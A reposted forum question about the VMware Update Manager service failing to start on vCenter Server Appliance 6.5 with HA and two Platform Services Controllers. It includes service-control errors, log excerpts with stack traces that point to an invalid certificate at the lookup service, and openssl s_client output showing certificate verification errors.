VCSA 6.5 with HA & 2 PSCs – VUM Service Can't Start

This post was originally published on this site

Hello All,

 

I am having an issue to start a VUM service based on VCSA 6.5 with HA & 2 PSCs.

 

Below are some info regarding the issue:

 

 

This is while I am trying to start the service.

 

[ ~ ]# service-control –start vmware-updatemgr

Perform start operation. vmon_profile=None, svc_names=[‘vmware-updatemgr’], include_coreossvcs=False, include_leafossvcs=False

2020-10-20T08:45:33.389Z   Service updatemgr state STOPPED

Error executing start on service updatemgr. Details {

    “resolution”: null,

    “detail”: [

        {

            “args”: [

                “updatemgr”

            ],

            “id”: “install.ciscommon.service.failstart”,

            “localized”: “An error occurred while starting service ‘updatemgr'”,                                                                                                                                                        

            “translatable”: “An error occurred while starting service ‘%(0)s'”

        }

    ],

    “componentKey”: null,

    “problemId”: null

}

Service-control failed. Error {

    “resolution”: null,

    “detail”: [

        {

            “args”: [

                “updatemgr”

            ],

            “id”: “install.ciscommon.service.failstart”,

            “localized”: “An error occurred while starting service ‘updatemgr'”,                                                                                                                                                        

            “translatable”: “An error occurred while starting service ‘%(0)s'”

        }

    ],

    “componentKey”: null,

    “problemId”: null

}

 

 

 

updatemgr-utility.log

 

[2020-10-20 11:44:57,995 ERROR] Unable to update CM service info

[2020-10-20 11:45:33,714 INFO] Install Key store for Jetty

[2020-10-20 11:45:35,427 INFO] Keystore installed successfully.

[2020-10-20 11:45:35,767 INFO] Updating VUM extension with VC

[2020-10-20 11:45:36,175 INFO] Updating CM service info

[2020-10-20 11:45:36,310 ERROR] CM ReRegisterService failure. Exception is (cis.cm.fault.ComponentManagerFault) {

   dynamicType = <unset>,

   dynamicProperty = (vmodl.DynamicProperty) [],

   msg = ”,

   faultCause = <unset>,

   faultMessage = (vmodl.LocalizableMessage) [],

   errorCode = 0,

   errorMessage = ‘UNKNOWN’

}

[2020-10-20 11:45:36,310 ERROR] Unable to update CM service info

 

 

 

cm.log (I have changed some specific information for security reasons)

 

2020-10-20T11:44:57.989+03:00 [pool-2-thread-1 [] ERROR com.vmware.cis.services.cm.service.ServiceManagerImplTemplate (cf3b9c43-81d5-4d1a-aad6-1bf3dd4b8971)] reRegisterService v1: Failed to re-register 70604e8d-0505-4ee9-ab0c-ad765d4cd1b7 (vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local, com.vmware.vcIntegrity/vcIntegrity 6.5.0)

com.vmware.vim.binding.vmodl.fault.InvalidArgument: null

        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:1.8.0_162]

        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62) ~[?:1.8.0_162]

        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:1.8.0_162]

        at java.lang.reflect.Constructor.newInstance(Constructor.java:423) ~[?:1.8.0_162]

        at java.lang.Class.newInstance(Class.java:442) ~[?:1.8.0_162]

        at com.vmware.vim.vmomi.core.types.impl.ComplexTypeImpl.newInstance(ComplexTypeImpl.java:174) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.types.impl.DefaultDataObjectFactory.newDataObject(DefaultDataObjectFactory.java:25) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.ComplexStackContext.<init>(ComplexStackContext.java:30) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl$UnmarshallSoapFaultContext.parse(UnmarshallerImpl.java:150) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl$UnmarshallSoapFaultContext.unmarshall(UnmarshallerImpl.java:101) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl.unmarshalSoapFault(UnmarshallerImpl.java:88) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl.unmarshalSoapFault(UnmarshallerImpl.java:83) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.SoapFaultStackContext.setValue(SoapFaultStackContext.java:40) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseUnmarshaller.processNextElement(ResponseUnmarshaller.java:127) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseUnmarshaller.unmarshal(ResponseUnmarshaller.java:70) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseImpl.unmarshalResponse(ResponseImpl.java:274) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseImpl.setResponse(ResponseImpl.java:230) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpExchangeBase.parseResponse(HttpExchangeBase.java:150) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpExchange.run(HttpExchange.java:48) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpProtocolBindingBase.executeRunnable(HttpProtocolBindingBase.java:226) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpProtocolBindingImpl.send(HttpProtocolBindingImpl.java:110) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl$CallExecutor.sendCall(MethodInvocationHandlerImpl.java:613) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl$CallExecutor.executeCall(MethodInvocationHandlerImpl.java:594) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.completeCall(MethodInvocationHandlerImpl.java:345) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.invokeOperation(MethodInvocationHandlerImpl.java:305) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.invoke(MethodInvocationHandlerImpl.java:179) ~[vlsi-client.jar:?]

        at com.sun.proxy.$Proxy100.set(Unknown Source) ~[?:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper$3.execute(LsVmomiSiteStore.java:229) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper$3.execute(LsVmomiSiteStore.java:226) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper.callLs(LsVmomiSiteStore.java:302) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper.set(LsVmomiSiteStore.java:224) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore.updateService(LsVmomiSiteStore.java:622) ~[service-cm.jar:?]

        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_162]

        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[?:1.8.0_162]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:333) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:190) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.vmware.cis.services.common.perfmon.PerfmonInterceptor.invoke(PerfmonInterceptor.java:31) ~[service-common.jar:?]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:92) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:213) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.sun.proxy.$Proxy67.updateService(Unknown Source) ~[?:?]

        at com.vmware.cis.services.cm.service.ServiceManagerImplTemplate.reRegisterService(ServiceManagerImplTemplate.java:306) [service-cm.jar:?]

        at com.vmware.cis.services.cm.service.ServiceManagerImpl.reRegisterService(ServiceManagerImpl.java:291) [service-cm.jar:?]

        at sun.reflect.GeneratedMethodAccessor182.invoke(Unknown Source) ~[?:?]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:333) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:190) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.vmware.cis.services.common.perfmon.PerfmonInterceptor.invoke(PerfmonInterceptor.java:31) [service-common.jar:?]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:92) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:213) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.sun.proxy.$Proxy68.reRegisterService(Unknown Source) [?:?]

        at sun.reflect.GeneratedMethodAccessor182.invoke(Unknown Source) ~[?:?]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at com.vmware.vim.vmomi.server.impl.InvocationTask.run(InvocationTask.java:65) [vlsi-server.jar:?]

        at com.vmware.vim.vmomi.server.common.impl.RunnableWrapper$1.run(RunnableWrapper.java:47) [vlsi-server.jar:?]

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_162]

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_162]

        at java.lang.Thread.run(Thread.java:748) [?:1.8.0_162]

2020-10-20T11:45:25.430+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:25.505+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:25.531+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:35.471+03:00 [pool-15-thread-1 [] INFO  com.vmware.cis.services.cm.service.ServiceManagerImplTemplate ()] search v1: Unauthorized, modifying search to only return SSO.

2020-10-20T11:45:35.472+03:00 [pool-15-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:35.588+03:00 [pool-2-thread-1 [] INFO  com.vmware.identity.token.impl.SamlTokenImpl (54d7ec2e-40eb-41cf-959f-7fd13f89ecf0)] SAML token for SubjectNameId [value=vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local, format=http://schemas.xmlsoap.org/claims/UPN] successfully parsed from Element

2020-10-20T11:45:35.590+03:00 [pool-2-thread-1 [] INFO  com.vmware.cis.services.common.sso.LoginHelper (54d7ec2e-40eb-41cf-959f-7fd13f89ecf0)] loginByToken: Successfully authenticated ‘vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local’ on session 01fcfd00-95fa-4a5f-a67e-a98dc60b9560

2020-10-20T11:45:35.594+03:00 [pool-15-thread-2 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:36.184+03:00 [pool-2-thread-1 [] INFO  com.vmware.identity.token.impl.SamlTokenImpl (6a4f8100-0b95-4429-8d8b-969c0726fdec)] SAML token for SubjectNameId [value=vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local, format=http://schemas.xmlsoap.org/claims/UPN] successfully parsed from Element

2020-10-20T11:45:36.185+03:00 [pool-2-thread-1 [] INFO  com.vmware.cis.services.common.sso.LoginHelper (6a4f8100-0b95-4429-8d8b-969c0726fdec)] loginByToken: Successfully authenticated ‘vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local’ on session a18aa98c-07b9-4cdf-920c-4b3b9f3f2949

2020-10-20T11:45:36.189+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:45:36.229+03:00 [pool-2-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider (da3d8caa-7207-4af8-8782-934dca2833f0)] Site affinity is disabled

2020-10-20T11:45:36.256+03:00 [pool-2-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider (da3d8caa-7207-4af8-8782-934dca2833f0)] Site affinity is disabled

2020-10-20T11:45:36.270+03:00 [pool-2-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider (da3d8caa-7207-4af8-8782-934dca2833f0)] Site affinity is disabled

2020-10-20T11:45:36.305+03:00 [pool-2-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider (da3d8caa-7207-4af8-8782-934dca2833f0)] Site affinity is disabled

2020-10-20T11:45:36.305+03:00 [pool-2-thread-1 [] WARN  com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore (da3d8caa-7207-4af8-8782-934dca2833f0)] Call to lookup service failed; uri::https://PSC01.domain.com/lookupservice/sdk [(vmodl.fault.InvalidArgument) {

   faultCause = null,

   faultMessage = null,

   invalidProperty = Invalid certificate

}]

2020-10-20T11:45:36.305+03:00 [pool-2-thread-1 [] ERROR com.vmware.cis.services.cm.service.ServiceManagerImplTemplate (da3d8caa-7207-4af8-8782-934dca2833f0)] reRegisterService v1: Failed to re-register 70604e8d-0505-4ee9-ab0c-ad765d4cd1b7 (vpxd-extension-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local, com.vmware.vcIntegrity/vcIntegrity 6.5.0)

com.vmware.vim.binding.vmodl.fault.InvalidArgument: null

        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:1.8.0_162]

        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62) ~[?:1.8.0_162]

        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:1.8.0_162]

        at java.lang.reflect.Constructor.newInstance(Constructor.java:423) ~[?:1.8.0_162]

        at java.lang.Class.newInstance(Class.java:442) ~[?:1.8.0_162]

        at com.vmware.vim.vmomi.core.types.impl.ComplexTypeImpl.newInstance(ComplexTypeImpl.java:174) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.types.impl.DefaultDataObjectFactory.newDataObject(DefaultDataObjectFactory.java:25) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.ComplexStackContext.<init>(ComplexStackContext.java:30) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl$UnmarshallSoapFaultContext.parse(UnmarshallerImpl.java:150) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl$UnmarshallSoapFaultContext.unmarshall(UnmarshallerImpl.java:101) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl.unmarshalSoapFault(UnmarshallerImpl.java:88) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.core.soap.impl.unmarshaller.UnmarshallerImpl.unmarshalSoapFault(UnmarshallerImpl.java:83) ~[vlsi-core.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.SoapFaultStackContext.setValue(SoapFaultStackContext.java:40) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseUnmarshaller.processNextElement(ResponseUnmarshaller.java:127) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseUnmarshaller.unmarshal(ResponseUnmarshaller.java:70) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseImpl.unmarshalResponse(ResponseImpl.java:274) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.ResponseImpl.setResponse(ResponseImpl.java:230) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpExchangeBase.parseResponse(HttpExchangeBase.java:150) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpExchange.run(HttpExchange.java:48) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpProtocolBindingBase.executeRunnable(HttpProtocolBindingBase.java:226) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.http.impl.HttpProtocolBindingImpl.send(HttpProtocolBindingImpl.java:110) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl$CallExecutor.sendCall(MethodInvocationHandlerImpl.java:613) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl$CallExecutor.executeCall(MethodInvocationHandlerImpl.java:594) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.completeCall(MethodInvocationHandlerImpl.java:345) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.invokeOperation(MethodInvocationHandlerImpl.java:305) ~[vlsi-client.jar:?]

        at com.vmware.vim.vmomi.client.common.impl.MethodInvocationHandlerImpl.invoke(MethodInvocationHandlerImpl.java:179) ~[vlsi-client.jar:?]

        at com.sun.proxy.$Proxy100.set(Unknown Source) ~[?:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper$3.execute(LsVmomiSiteStore.java:229) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper$3.execute(LsVmomiSiteStore.java:226) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper.callLs(LsVmomiSiteStore.java:302) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore$LsVmomiWrapper.set(LsVmomiSiteStore.java:224) ~[service-cm.jar:?]

        at com.vmware.cis.services.cm.service.impl.LsVmomiSiteStore.updateService(LsVmomiSiteStore.java:622) ~[service-cm.jar:?]

        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_162]

        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[?:1.8.0_162]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:333) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:190) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.vmware.cis.services.common.perfmon.PerfmonInterceptor.invoke(PerfmonInterceptor.java:31) ~[service-common.jar:?]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:92) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:213) ~[spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.sun.proxy.$Proxy67.updateService(Unknown Source) ~[?:?]

        at com.vmware.cis.services.cm.service.ServiceManagerImplTemplate.reRegisterService(ServiceManagerImplTemplate.java:306) [service-cm.jar:?]

        at com.vmware.cis.services.cm.service.ServiceManagerImpl.reRegisterService(ServiceManagerImpl.java:291) [service-cm.jar:?]

        at sun.reflect.GeneratedMethodAccessor182.invoke(Unknown Source) ~[?:?]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:333) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:190) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.vmware.cis.services.common.perfmon.PerfmonInterceptor.invoke(PerfmonInterceptor.java:31) [service-common.jar:?]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:92) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:213) [spring-aop-4.3.9.RELEASE.jar:4.3.9.RELEASE]

        at com.sun.proxy.$Proxy68.reRegisterService(Unknown Source) [?:?]

        at sun.reflect.GeneratedMethodAccessor182.invoke(Unknown Source) ~[?:?]

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_162]

        at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_162]

        at com.vmware.vim.vmomi.server.impl.InvocationTask.run(InvocationTask.java:65) [vlsi-server.jar:?]

        at com.vmware.vim.vmomi.server.common.impl.RunnableWrapper$1.run(RunnableWrapper.java:47) [vlsi-server.jar:?]

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_162]

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_162]

        at java.lang.Thread.run(Thread.java:748) [?:1.8.0_162]

2020-10-20T11:48:27.891+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:27.968+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:27.994+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:28.239+03:00 [pool-15-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:28.273+03:00 [pool-15-thread-2 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.191+03:00 [pool-2-thread-1 [] INFO  com.vmware.cis.services.common.sso.LoginHelper (af898b09-76d9-4ab5-94b5-18d287f29cd0)] loginByToken: User ‘vsphere-webclient-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local’ is already authenticated

2020-10-20T11:48:35.193+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.204+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.230+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.493+03:00 [pool-2-thread-1 [] INFO  com.vmware.cis.services.common.sso.LoginHelper (0feecd59-fdc2-4631-9849-e6349adf3e0a)] loginByToken: User ‘vsphere-webclient-678b208e-5d5e-4c43-b100-bb0f3a079af6@domain.local’ is already authenticated

2020-10-20T11:48:35.521+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.639+03:00 [pool-15-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.783+03:00 [pool-15-thread-2 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.828+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.853+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.882+03:00 [pool-15-thread-1 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.922+03:00 [pool-15-thread-2 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:48:35.955+03:00 [pool-15-thread-3 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

2020-10-20T11:49:47.847+03:00 [pool-15-thread-4 [] INFO  com.vmware.vim.lookup.client.SiteAffinityServerEndpointProvider ()] Site affinity is disabled

 

 

After I checked these details and did a quick search, I found these articles below:

 

https://kb.vmware.com/s/article/76298

https://communities.vmware.com/thread/598354

 

There is some mention regarding:

 

The SSL certificate of STS service cannot be verified

 

But I couldn’t find it in my log.

 

 

This is the output from the suggest command: Openssl s_client -connect <PSC/VCSA-FQDN/IP>:7444 | less

 

Openssl s_client -connect psc01.domain.com:7444

CONNECTED(00000194)

depth=0 CN = psc01.domain.com, C = XX, ST = XX, L = Palo Alto, O = XX, OU = VMware Engineering

verify error:num=20:unable to get local issuer certificate

verify return:1

depth=0 CN = psc01.domain.com, C = XX, ST = XX, L = Palo Alto, O = XX, OU = VMware Engineering

verify error:num=21:unable to verify the first certificate

verify return:1

Certificate chain

0 s:CN = psc01.domain.com, C = XX, ST = XX, L = Palo Alto, O = XX, OU = VMware Engineering

   i:CN = psc01.domain.com, DC = XX, DC = local, C = XX, ST = XX, O = psc01.domain.com, OU = VMware Engineering

Server certificate

—–BEGIN CERTIFICATE—–

XXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXX

—–END CERTIFICATE—–

subject=CN = psc01.domain.com, C = XX, ST = XX, L = Palo Alto, O = XX, OU = VMware Engineering

 

 

issuer=CN = psc01.domain.com, DC = XX, DC = local, C = XX, ST = XX, O = psc01.domain.com, OU = VMware Engineering

 

 

No client certificate CA names sent

Peer signing digest: SHA256

Peer signature type: RSA

Server Temp Key: ECDH, P-256, 256 bits

SSL handshake has read 1592 bytes and written 451 bytes

Verification error: unable to verify the first certificate

New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384

